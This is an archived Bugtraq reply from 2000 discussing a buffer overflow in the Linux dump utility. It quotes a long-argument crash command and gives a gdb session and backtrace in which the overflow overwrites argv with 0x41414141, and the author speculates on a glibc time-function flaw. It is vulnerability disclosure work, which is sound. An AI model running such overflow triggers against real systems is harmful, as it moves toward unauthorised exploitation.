Bugtraq mailing list archives
Re: [ Hackerslab bug_paper ] Linux dump buffer overflow
From: super () UDEL EDU (Derek Callaway)
Date: Wed, 1 Mar 2000 09:58:16 -0500
On Mon, 28 Feb 2000, ±è¿ëÁØ KimYongJun (99Á¹¾÷) wrote:
[ Hackerslab bug_paper ] Linux dump buffer overflow
<snip>
[loveyou@loveyou SOURCES]$ dump -f a `perl -e 'print "x" x 556'` DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000 DUMP: Date of last level dump: the epoch DUMP: Dumping xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: ÆÄÀÏ À̸§ÀÌ ³Ê¹« ±é´Ï´Ù while opening filesystem DUMP: SIGSEGV: ABORTING! Segmentation fault
<snip> Could this be a problem with glibc, as well? [super@white dump]$ pwd /usr/src/redhat/SOURCES/dump-0.4b4/dump [super@white dump]$ echo -e "ru -0 `perl -e 'print "A"x5000;'`\nbt" | gdb dump GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) Starting program: /usr/src/redhat/SOURCES/dump-0.4b4/dump/dump -0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <snipped long string> ---Type <return> to continue, or q <return> to quit---Program received signal SIGSEGV, Segmentation fault. getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88 88 ../sysdeps/generic/getenv.c: No such file or directory. (gdb) #0 getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88 #1 0x400b3f4a in tzset_internal (always=1094795585) at tzset.c:144 #2 0x400b4ceb in __tz_convert (timer=0xbfffd790, use_localtime=1, tp=0x4011e4e0) at tzset.c:575 #3 0x400b08bc in localtime (t=0xbfffd790) at localtime.c:43 #4 0x400b07f8 in ctime (t=0xbfffd790) at ctime.c:32 #5 0x804adde in main (argc=1094795585, argv=0x41414141) at main.c:355 (gdb) [super@white dump]$
From this gdb session, it appears that there _could_ be a problem with
the way that glibc's time functions behave. -- /* Derek Callaway <super () udel edu> char *sites[]={"http://www.geekwise.com", Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc", (302) 837-8769 "http://www.homeworkhelp.org",0}; S@IRC */
Current thread:
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Brett Lymn (Feb 29)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Joe Shaw (Mar 01)
- <Possible follow-ups>
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow H D Moore (Feb 29)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Derek Callaway (Mar 01)
- Foundry Networks ServerIron sequence predictability fix soon to be available Andrew van der Stock (Mar 01)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Przemyslaw Frasunek (Mar 01)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Ronald Huizer (Mar 04)
- OpenLinux 2.3: rpm_query harikiri (Mar 04)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Eugene Teo (Mar 02)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Derek Callaway (Mar 02)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Przemyslaw Frasunek (Mar 03)
- Potential security problem with mtr Viktor Fougstedt (Mar 03)
- Re: Potential security problem with mtr LaMont Jones (Mar 03)
- Re: Potential security problem with mtr Viktor Fougstedt (Mar 03)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Derek Callaway (Mar 02)